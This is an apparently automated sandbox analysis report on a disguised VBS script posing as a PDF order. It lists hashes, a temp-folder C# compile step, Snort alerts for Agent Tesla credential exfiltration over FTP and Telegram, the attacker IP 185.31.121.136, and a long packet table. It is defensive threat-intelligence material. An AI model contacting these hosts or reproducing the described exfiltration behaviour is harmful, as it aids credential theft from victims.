MD5:	0F0859B8EE75C7F44B97667B8E67740B
SHA1:	68F2664181B267168FEDD8751AA7B84BD5B27E95
SHA-256:	A8295C9CCD4AC423E50F826A4689A3EE33179A17A856ABABAA54865A8F9638F6
SHA-512:	974CC9FF0A68542A23DA398F3C172028AC7E9721D8765696FBB4E6DD59D57CA5A0FCA44E1B8EED645BFAC3BE9628D3B03F1A6B93E2D37462D72C7326CB493710
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General

File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	5.8757896066938615
TrID:
File name:	Ordine n.47201 pdf.vbs
File size:	345196
MD5:	c8290bc8659c4a6a45ccd1af9268e400
SHA1:	d2a97dd4fa44d5e2a568d75b764cc47e5878f960
SHA256:	f39968efba7ebe58abba685f5b834f6e0c8393dfaeaf7d08d5f6e625c33a04e1
SHA512:	52cf38b8095759f33affba504463f1d8b44d2497efa1bb21e84e63d75d52a61e45b3327a01d5c0fd54116091273d429066603e2e50dfc9303bddf54f9896f6c5
SSDEEP:	6144:JgYNxYywvF7r/8o1W1iajiYGnCEMDKlM58vbu7bhHZIKK:iVvF7r07iYGCEMejc6KK
TLSH:	5D749E50EFD9191D0D4B3A7A9C831B48F93DCE2611F6F4E96DA8138D3B02658C66F239
File Content Preview:	..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.7185.31.121.13649726613132851779 11/28/22-14:53:16.335427	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49726	61313	192.168.2.7	185.31.121.136
192.168.2.7185.31.121.13649725212029927 11/28/22-14:53:16.290035	TCP	2029927	ET TROJAN AgentTesla Exfil via FTP	49725	21	192.168.2.7	185.31.121.136

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2022 14:52:53.434041023 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.602250099 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.602458000 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.606096983 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.773952961 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.774775028 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.774816036 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.774847031 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.774892092 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.774915934 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.774915934 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.774936914 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.774951935 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.774952888 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.774981022 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.775005102 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.775038958 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.775060892 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.775075912 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.775108099 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.775119066 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.775152922 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943191051 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943248987 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943280935 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943325996 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943351030 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943372011 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943392038 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943398952 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943409920 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943419933 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943428040 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943444967 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943460941 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943463087 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943480968 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943485022 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943499088 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943511009 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943516016 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943532944 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943542957 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943551064 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943568945 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943586111 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943587065 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943603992 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943617105 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943623066 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943633080 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943640947 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:53.943664074 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:53.943691015 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.111486912 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111556053 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111603975 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111648083 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111684084 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111701965 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111718893 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111737967 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111756086 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111773968 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111792088 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111809969 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111807108 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.111828089 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111846924 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111865044 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111882925 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111901045 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111918926 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111936092 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111953974 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111954927 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.111970901 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.111989021 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112005949 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112023115 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112040997 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112054110 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.112059116 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112076998 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112095118 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112114906 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112133980 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112137079 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.112150908 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112169027 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112186909 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112204075 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112221003 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.112221956 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112241030 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112257957 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112276077 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112293959 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112299919 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.112310886 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.112426043 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.112426043 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.279959917 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.279989958 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280006886 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280033112 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280052900 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280060053 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280082941 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280090094 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280111074 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280133963 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280147076 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280158997 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280184984 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280191898 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280224085 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280231953 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280268908 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280273914 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280313015 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280313969 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280349016 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280354977 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280384064 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280386925 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280427933 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280427933 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280452013 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280478001 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280488968 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280503035 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280520916 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280530930 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280550957 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280565023 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280575037 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280611992 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280618906 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280652046 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280653000 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280680895 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280699968 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280705929 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280744076 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280746937 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280776024 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280781031 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280802011 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280819893 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280819893 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280837059 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280848026 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280864000 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280869961 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280888081 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280898094 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280909061 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280931950 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280935049 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.280966043 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.280970097 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281006098 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281011105 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281028986 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281048059 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281054020 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281066895 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281071901 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281088114 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281096935 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281112909 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281116009 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281132936 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281133890 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281151056 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281153917 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281168938 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281174898 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281187057 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281194925 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281204939 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281222105 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281222105 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281240940 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281250000 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281256914 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281274080 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281282902 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281291962 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281303883 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281308889 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281327009 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281337023 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281343937 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281361103 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281367064 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281378984 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281388998 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281397104 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281414032 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281421900 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281431913 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281450033 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281454086 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281466961 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281476021 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281485081 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281502008 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281512022 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281518936 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281536102 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281543970 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281553030 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281564951 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281569958 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281588078 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281594992 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281605005 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281622887 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281625986 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281640053 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281647921 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281657934 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281673908 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281676054 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281691074 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281706095 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281708956 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281725883 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281735897 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281743050 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281760931 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281769037 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281779051 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281795025 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281799078 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281811953 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281821012 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281830072 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281847954 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.281856060 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.281888962 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.450717926 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.450777054 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.450817108 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.450851917 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.450885057 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.450896025 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.450915098 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.450932980 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.450946093 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.450951099 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.450965881 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.450984001 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451000929 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451018095 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451035023 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451057911 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451061964 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.451085091 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451103926 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451117992 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451137066 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451154947 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451167107 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451184034 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451200008 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451219082 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:54.451230049 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.451230049 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.451230049 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.451230049 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.451246023 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:54.451289892 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:52:59.454648972 CET	80	49722	162.240.62.179	192.168.2.7
Nov 28, 2022 14:52:59.454813957 CET	49722	80	192.168.2.7	162.240.62.179
Nov 28, 2022 14:53:00.489233017 CET	49723	443	192.168.2.7	52.20.78.240
Nov 28, 2022 14:53:00.489310980 CET	443	49723	52.20.78.240	192.168.2.7
Nov 28, 2022 14:53:00.489429951 CET	49723	443	192.168.2.7	52.20.78.240
Nov 28, 2022 14:53:00.614367008 CET	49723	443	192.168.2.7	52.20.78.240
Nov 28, 2022 14:53:00.614427090 CET	443	49723	52.20.78.240	192.168.2.7
Nov 28, 2022 14:53:00.928427935 CET	443	49723	52.20.78.240	192.168.2.7
Nov 28, 2022 14:53:00.928539991 CET	49723	443	192.168.2.7	52.20.78.240
Nov 28, 2022 14:53:00.955156088 CET	49723	443	192.168.2.7	52.20.78.240
Nov 28, 2022 14:53:00.955198050 CET	443	49723	52.20.78.240	192.168.2.7
Nov 28, 2022 14:53:00.956041098 CET	443	49723	52.20.78.240	192.168.2.7
Nov 28, 2022 14:53:01.011245966 CET	49723	443	192.168.2.7	52.20.78.240
Nov 28, 2022 14:53:02.135617971 CET	49723	443	192.168.2.7	52.20.78.240
Nov 28, 2022 14:53:02.135668039 CET	443	49723	52.20.78.240	192.168.2.7
Nov 28, 2022 14:53:02.350281954 CET	443	49723	52.20.78.240	192.168.2.7
Nov 28, 2022 14:53:02.350423098 CET	443	49723	52.20.78.240	192.168.2.7
Nov 28, 2022 14:53:02.350512981 CET	49723	443	192.168.2.7	52.20.78.240
Nov 28, 2022 14:53:02.351636887 CET	49723	443	192.168.2.7	52.20.78.240
Nov 28, 2022 14:53:15.850030899 CET	49725	21	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:15.890693903 CET	21	49725	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:15.892544031 CET	49725	21	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:15.934382915 CET	21	49725	185.31.121.136	192.168.2.7
